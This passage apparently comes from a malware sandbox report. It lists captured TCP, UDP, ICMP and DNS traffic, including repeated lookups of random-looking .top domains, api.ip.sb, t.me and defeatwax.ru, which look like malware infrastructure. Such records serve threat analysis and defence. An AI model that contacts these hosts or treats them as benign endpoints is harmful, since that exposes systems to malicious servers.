                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858196020 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858213902 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858232021 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858252048 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858277082 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858283997 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858302116 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858320951 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858339071 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858349085 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858357906 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858417988 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858422995 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858467102 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858470917 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858489990 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858506918 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858544111 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858586073 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858628035 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858659983 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858679056 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858700991 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858721972 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858727932 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858746052 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858762980 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858777046 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858808041 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858815908 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858850002 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858892918 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913274050 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913305998 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913331032 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913341045 CEST8049771194.147.85.186192.168.2.6

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Sep 27, 2021 19:33:18.406043053 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:33:18.429265976 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:33:49.409531116 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:33:49.440653086 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:07.191087008 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:07.210633993 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:13.728676081 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:13.811065912 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.093039036 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.195302010 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.222486973 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.326502085 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.364077091 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.425928116 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.465382099 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.499425888 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.510271072 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.513314962 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.524566889 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.626837969 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.644284964 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:15.243505955 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:15.281732082 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:15.292186975 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:15.295691967 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:15.674627066 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.203670979 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.289499998 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.719695091 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.870421886 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.881614923 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.055546999 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.071249962 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.191394091 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.246506929 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.284881115 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.385461092 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.588907003 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.871890068 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.884668112 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.220540047 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.951180935 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.963875055 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.182679892 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.186295033 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.201778889 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.263353109 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.591423988 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:21.452070951 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:21.627041101 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:21.640595913 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:21.831391096 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:22.066333055 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:22.457231045 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.565519094 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.582813025 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.821450949 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.835047007 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:27.722908020 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:27.736285925 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:28.389682055 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:28.403305054 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:28.775993109 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.405194044 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.709583998 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.723232985 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:30.043598890 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:30.057070017 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:35.739319086 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:35.757567883 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.179837942 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.195090055 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.515753031 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.531582117 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:43.727261066 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:43.740174055 CEST53581778.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.071888924 CEST5070053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.088499069 CEST53507008.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.423293114 CEST5406953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.439909935 CEST53540698.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.889302969 CEST6117853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.903294086 CEST53611788.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.152374029 CEST5701753192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.165852070 CEST53570178.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.385431051 CEST5632753192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.821141958 CEST53563278.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.020289898 CEST5024353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.035063982 CEST53502438.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.076296091 CEST6205553192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.091289043 CEST53620558.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.325368881 CEST6124953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.338222980 CEST53612498.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.647686958 CEST6525253192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.661124945 CEST53652528.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.989340067 CEST6436753192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:47.002038002 CEST53643678.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:48.320816994 CEST5506653192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:48.725550890 CEST53550668.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.245259047 CEST6021153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.259675026 CEST53602118.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.517163992 CEST5657053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.531271935 CEST53565708.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.172421932 CEST5845453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.187031031 CEST53584548.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.561320066 CEST5518053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.574778080 CEST53551808.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.386094093 CEST5872153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.766330004 CEST53587218.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.998267889 CEST5769153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.012435913 CEST53576918.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.355072975 CEST5294353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.368376970 CEST53529438.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:07.516406059 CEST5948953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:07.529788971 CEST53594898.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.006237030 CEST6402253192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.019428968 CEST53640228.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.409050941 CEST6002353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.422373056 CEST53600238.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.426815987 CEST5719353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.440402031 CEST53571938.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.885338068 CEST5024853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.898325920 CEST53502488.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.245388985 CEST6441353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.258060932 CEST53644138.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.491678953 CEST6042953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.507046938 CEST53604298.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.359608889 CEST6034553192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.373219013 CEST53603458.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:37.989953041 CEST5873053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.012115955 CEST53587308.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.026782990 CEST5383053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.045906067 CEST53538308.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.158591032 CEST5722653192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.180354118 CEST53572268.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.195486069 CEST5788053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.210144043 CEST6085053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.212959051 CEST53578808.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.249732018 CEST53608508.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.276437998 CEST5318753192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.290045977 CEST53531878.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.318586111 CEST5583053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.331665039 CEST53558308.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.420869112 CEST5514553192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.444024086 CEST53551458.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:42.701020002 CEST6409153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:42.736085892 CEST53640918.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:45.609464884 CEST5572853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:45.626606941 CEST53557288.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:49.600155115 CEST5569453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:49.643933058 CEST53556948.8.8.8192.168.2.6

                                                                                                                                                                                                  ICMP Packets

                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.246696949 CEST192.168.2.68.8.8.8cff5(Port unreachable)Destination Unreachable
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.201894045 CEST192.168.2.68.8.8.8cff5(Port unreachable)Destination Unreachable

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.093039036 CEST192.168.2.68.8.8.80x1917Standard query (0)naghenrietti1.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.222486973 CEST192.168.2.68.8.8.80x205eStandard query (0)kimballiett2.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.364077091 CEST192.168.2.68.8.8.80x1183Standard query (0)xadriettany3.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.499425888 CEST192.168.2.68.8.8.80x1eStandard query (0)jebeccallis4.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.524566889 CEST192.168.2.68.8.8.80x1e4eStandard query (0)nityanneron5.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:14.644284964 CEST192.168.2.68.8.8.80x9de7Standard query (0)umayaniela6.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:15.674627066 CEST192.168.2.68.8.8.80x9de7Standard query (0)umayaniela6.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.719695091 CEST192.168.2.68.8.8.80x9de7Standard query (0)umayaniela6.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:16.881614923 CEST192.168.2.68.8.8.80x30b5Standard query (0)lynettaram7.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.284881115 CEST192.168.2.68.8.8.80x1df1Standard query (0)sadineyalas8.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:17.588907003 CEST192.168.2.68.8.8.80x55dcStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.951180935 CEST192.168.2.68.8.8.80x106Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.186295033 CEST192.168.2.68.8.8.80x7f59Standard query (0)privacy-toolz-for-you-403.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:21.452070951 CEST192.168.2.68.8.8.80xc52fStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:22.066333055 CEST192.168.2.68.8.8.80x1505Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.565519094 CEST192.168.2.68.8.8.80x1105Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.821450949 CEST192.168.2.68.8.8.80xd0a4Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:28.775993109 CEST192.168.2.68.8.8.80xdeecStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.709583998 CEST192.168.2.68.8.8.80x2827Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:30.043598890 CEST192.168.2.68.8.8.80x14bbStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.179837942 CEST192.168.2.68.8.8.80x2d9aStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:38.515753031 CEST192.168.2.68.8.8.80x9ed4Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:43.727261066 CEST192.168.2.68.8.8.80x53e2Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.071888924 CEST192.168.2.68.8.8.80xe720Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.423293114 CEST192.168.2.68.8.8.80x7461Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.889302969 CEST192.168.2.68.8.8.80xcdecStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.152374029 CEST192.168.2.68.8.8.80x11b2Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.385431051 CEST192.168.2.68.8.8.80xf8a0Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.076296091 CEST192.168.2.68.8.8.80xa452Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.325368881 CEST192.168.2.68.8.8.80xeb48Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.647686958 CEST192.168.2.68.8.8.80x7644Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.989340067 CEST192.168.2.68.8.8.80xd8e1Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:48.320816994 CEST192.168.2.68.8.8.80x15baStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.245259047 CEST192.168.2.68.8.8.80x7ba1Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.517163992 CEST192.168.2.68.8.8.80x8187Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.172421932 CEST192.168.2.68.8.8.80x94edStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.561320066 CEST192.168.2.68.8.8.80xeed5Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.386094093 CEST192.168.2.68.8.8.80x2f8cStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.998267889 CEST192.168.2.68.8.8.80x44aeStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.355072975 CEST192.168.2.68.8.8.80xc836Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:07.516406059 CEST192.168.2.68.8.8.80xae09Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.006237030 CEST192.168.2.68.8.8.80x12d9Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.409050941 CEST192.168.2.68.8.8.80x7492Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.426815987 CEST192.168.2.68.8.8.80x189bStandard query (0)t.meA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.885338068 CEST192.168.2.68.8.8.80xa828Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.245388985 CEST192.168.2.68.8.8.80x4960Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.491678953 CEST192.168.2.68.8.8.80xe9f8Standard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.359608889 CEST192.168.2.68.8.8.80x75aeStandard query (0)geenaldencia9.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:37.989953041 CEST192.168.2.68.8.8.80xb34eStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.026782990 CEST192.168.2.68.8.8.80xf975Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.158591032 CEST192.168.2.68.8.8.80x5775Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.195486069 CEST192.168.2.68.8.8.80x4880Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.210144043 CEST192.168.2.68.8.8.80x1176Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.276437998 CEST192.168.2.68.8.8.80x9c58Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.318586111 CEST192.168.2.68.8.8.80xd2d8Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.420869112 CEST192.168.2.68.8.8.80xf57fStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                                  Sep 27, 2021 19:35:49.600155115 CEST192.168.2.68.8.8.80xe8fdStandard query (0)defeatwax.ruA (IP address)IN (0x0001)

                                                                                                                                                                                                  DNS Answers

